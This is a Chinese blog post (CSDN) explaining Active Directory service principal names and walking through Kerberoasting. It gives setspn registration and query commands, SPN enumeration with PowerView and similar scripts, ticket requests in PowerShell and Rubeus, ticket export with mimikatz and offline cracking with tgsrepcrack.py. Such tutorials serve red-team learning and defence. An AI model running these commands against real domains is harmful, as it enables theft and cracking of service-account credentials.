SPN的相关利用

最新推荐文章于 2023-03-17 21:25:21 发布
最新推荐文章于 2023-03-17 21:25:21 发布
阅读量795 收藏 2
点赞数
文章标签: 系统安全 开发语言 c#
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hongduilanjun/article/details/127641301
版权

0x01 什么是SPN

服务主体名称(SPN)是服务实例,可以理解为一个服务,比如mssql,http等等的唯一标识符。如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPN,Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。

0x02 注册SPN

2.1 机器账户

只有机器账户或者域管账户才有权限注册SPN。

setspn -S mssqlserver/hostname.xx.com:1433 accountname

2.2 域用户

setspn -S SqlServer/mssql.redteam.local:1434/SqlServer hack

2.3 查看已注册的SPN

查看域内所有SPN

setspn -q */*

指定查看域注册的SPN

setspn -T redteam.local -q */*

删除指定SPN

setspn -D mssql/mssql.redteam.local:1433/mssql mssql

指定用户名/主机名查看SPN

setspn -L username/hostname

0x03 SPN扫描

在域内渗透我们就不需要通过扫描来查看到底那台机器开了那些服务,可以通过SPN来获取想要的信息。相对于隐蔽性强。

3.1 PowerView

powershell -exec bypass
Import-module .\powerview.ps1
Get-NetUser -SPN

3.2 PowerShell-AD-Recon

Import-Module .\Discover-PSInterestingServices.ps1
Discover-PSInterestingServices      #扫描域内的所有SPN信息

3.3 GetUserSPNs

Import-Module .\GetUserSPNs.ps1

3.4 流量分析

通过wireshark可以看到

就是通过LDAP协议向域控服务器上的LADP查询了SPN服务。

可以通过ADSI编辑器查看用户属性的servicePrincipalName值

0x04 Kerberoasting

kerberos通信过程:

在TGS-REQ中会发出ST服务票据获取servicePrincipalName(SPN),该SPN是用户或者机器用户注册的。TGS-REP中TGS会返回给user一个ST,而ST是由user请求的server的密码进行加密的,我们可以从TGS-REP中提取加密的服务票证来进行离线解密。

在本地安全策略中将kerberos允许的加密类型改为RC4加密:

在运行更新策略:

gpupdate

4.1 SPN扫描

Import-Module .\GetUserSPNs.ps1

4.2 请求票据

4.2.1 powershell请求

Add-Type -AssemblyName System.IdentityModel  New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SqlServer/mssql.redteam.local:1434/SqlServer"

4.2.2 Rubeus.exe

Rubeus.exe kerberoast

Rubeus原理为现在LDAP查询SPN,再发送TGS包,再打印出hash,可以使用hashcat等进行爆破。

4.3 导出票据

mimikatz导出票据

kerberos::list /export

4.4 离线破解

使用tgsrepcrack.py

python2 tgsrepcrack.py pass.txt xx.kirbi

红队蓝军
关注
SPN(Service Principal Names)
whojoe的博客
05-24 2531
SPN(Service Principal Names)SPN注册SPNSPN查询setspn.exePowerShell-AD-ReconGetUserSPNSPowerView.ps1利用参考文章 SPN 服务主体名称(Service Principal Names)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例,则每个实例都必须具有自己的SPNSPN分为两种
SPN相关利用(上)
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
04-18 263
服务主体名称(SPN)是服务实例,可以理解为一个服务,比如mssql,http等等的唯一标识符。如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPN,Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。
域渗透-SPN与kerberoast攻击
m0_58596609的博客
11-15 1958
一:SPN服务主体名称 SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、MSSQL、MySQL等服务)的唯一标识符。 1.1:SPN介绍 Kerberos认证过程使用SPN将服务实例与服务登录账户相关联,如果想使用 Kerberos 协议来认证服务,那么必须正确配置SPN。如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPN。如果客户端可能使用多个名称进行身份验证,则给定服务实例可以具有多个SPNSPN 始终包含运行..
内网安全 - 域横向移动RDP&SPN
acepanhuan的博客
03-17 504
内网安全 - 域横向移动RDP&SPN
SPN发现与利用
wo41ge的博客
04-15 1万+
0x01 简介 服务主体名称(SPN)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例,则每个实例都必须具有自己的SPN。如果客户端可能使用多个名称进行身份验证,则给定的服务实例可以具有多个SPN 0x02类型 SPN 可以分为两种: 当一个服务的权限为Local System或Network Service,则SPN注册在域内机器帐户(Computers)下
SPN和FMI自制计算器
02-21
例如,可以使用pandas库来读取和操作数据,用正则表达式来解析复杂的代码,或者利用matplotlib进行数据可视化,帮助用户更好地理解故障模式的分布和趋势。 在"故障码计算器"这个项目中,开发者可能创建了一个交互式...
承载网 SPN 中兴培训教材
12-15
2. **FlexE技术**:FlexE(Flexible Ethernet)是SPN的关键技术支持,它可以将物理链路划分为多个独立的通道,每个通道具有固定的带宽和低时延,提高了网络资源的利用率和隔离性。 3. **5G承载需求**:5G网络对承载...
切片分组网(SPN)技术
05-09
切片分组网(SPN,Slicing Packet Network)是一种为满足5G传输网络需求而设计的新型架构,它在4G传输网络的基础上进行了大幅度的革新。SPN技术旨在提供大带宽、低时延、高精度同步以及灵活的网络切片能力,以适应5G...
SPN线性密码分析
02-25
SPN结构中,如果存在非零的线性关系,即存在一组权重向量,使得明文和密文之间的关系可以近似为线性组合,那么攻击者可能利用这些关系来减少破解密钥的复杂度。 4. **C语言实现** 在C语言中实现SPN结构和线性...
【深度分析】关于SPN不正确导致SQL数据库连接失败
weixin_42556618的博客
06-11 2451
连接SQL Server数据库时发生报错“The target principal name is incorrect. Cannot generate SSPI context”,无法连接,可能是由于AD域中记录了错误的SPN,导致无法进行身份验证而连接失败。下文通过简述Kerberos认证过程、SPN的组成,引出由SPN错误引发报错的解决方法。 Kerberos认证 1.Kerberos认证步骤 Kerberos认证需要包含KDC(Key Distribution Center)...
汽车故障码大全
03-14
不少车主对汽车故障解码器(特别是数字显示的解码器)上的故障码,不知道是什么意思,为此整理了故障码大全,希望能帮助到需要的车主(注:我是转载,原作者是谁俺也不知道)。
【系统运维】日常运维常用命令 - 持续更新
aladinggao的博客
09-24 2163
foreach ($pc in $pcs) {.\psexec \\$pc -s "c:\windows\system32\ipconfig.exe" /registerdns} Get-MailboxFolderPermission -Identity "m@m.com:\calendar" remove-MailboxFolderPermission -Identity "hk.a@m.com:\calendar" -User "u, co" Get-AzureADUser -all $true |
安全技术 | 域渗透之SPN
Jeeseen123的博客
10-19 1495
Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。在内网中,SPN扫描通过查询向域控服务器执行服务发现,可以识别正在运行重要服务的主机,如终端,交换机等。SPN的识别是Kerberoasting攻击的第一步。本文由锦行科技的安全研究团队提供,旨在通过对SPN进行介绍,帮助大家深入了解Kerberoasting攻击过程以应对该种攻击。 SPN SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)的唯一标识符。Kerbe
【内网学习笔记】24、SPN 的应用
TeamsSix 的 CSDN 空间
09-07 1204
0、前言 SPN Windows 域环境是基于微软的活动目录服务工作的,它在网络系统环境中将物理位置分散、所属部门不同的用户进行分组和集中资源,有效地对资源访问控制权限进行细粒度的分配,提高了网络环境的安全性及网络资源统一分配管理的便利性。 在域环境中运行的大量应用包含了多种资源,为了对资源的合理分类和再分配提供便利,微软给域内的每种资源分配了不同的服务主题名称即 SPN (Service Principal Name) Kerberos Kerberos 是由 MIT 提出的一种网络身份验证协议,旨在通过
域渗透之SPN服务主体名称
谢公子的博客
01-21 2595
目录 SPN SPN的配置 SetSPN 注册SPN 查询SPN SPN的扫描 PowerShell-AD-Recon GetUserSPNs.ps1 GetUserSPNs.vbs PowerView.ps1 PowerShellery SPN SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)的...
怎么修改SQL Server服务器选项,Analysis Services 实例的 SPN 注册 | Microsoft Docs
weixin_42500279的博客
08-13 831
SPN registration for an Analysis Services instance05/02/2018本文内容适用于:SQL Server Analysis ServicesAzure Analysis ServicesPower BI Premium在使用 Kerberos 对客户端和服务标识进行相互身份验证时,服务主体名称 (SPN) 唯一标识 Active Director...
SVN_SERVER的搭建
热门推荐
看云丶听水--博客
08-25 2万+
SVN_SERVER配置文档---windows系统 在 Windows 下使用 Virtual SVN 和 Tortoise SVN 来搭建 SVN 客户端和服务器端 1.      下载最新版本的包 Virtual SVN 下载地址:https://www.visualsvn.com/ Tortoise SVN 下载地址:https://tortoisesvn.net/ 2.
SPN(Service Principal name)服务器主体名称
lionzl的专栏
01-04 3489
SPN(Service Principal name)服务器主体名称。 SPN 是服务在使用 Kerberos 身份验证的网络上的唯一标识符。它由服务类、主机名和端口组成。在使用 Kerberos 身份验证的网络中,必须在内置计算机帐户(如 NetworkService 或 LocalSystem)或用户帐户下为服务器注册 SPN。对于内置帐户,SPN 将自动进行注册。但是,如果在域用户帐户下
为 SQL Server 站点数据库服务器配置 SPN
黄森林
06-25 2940
如何为 SQL Server 站点数据库服务器配置 SPN主题上次更新时间 – 2008 年 1 月使用 SQL Server 计算机的本地系统帐户运行 SQL Server 服务不是 SQL Server 最佳方案。为了最安全地运行 SQL Server 站点数据库服务器,应该配置一个低权限的域用户帐户来运行 SQL Server 服务。必须为 SQL Server 服务帐户
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值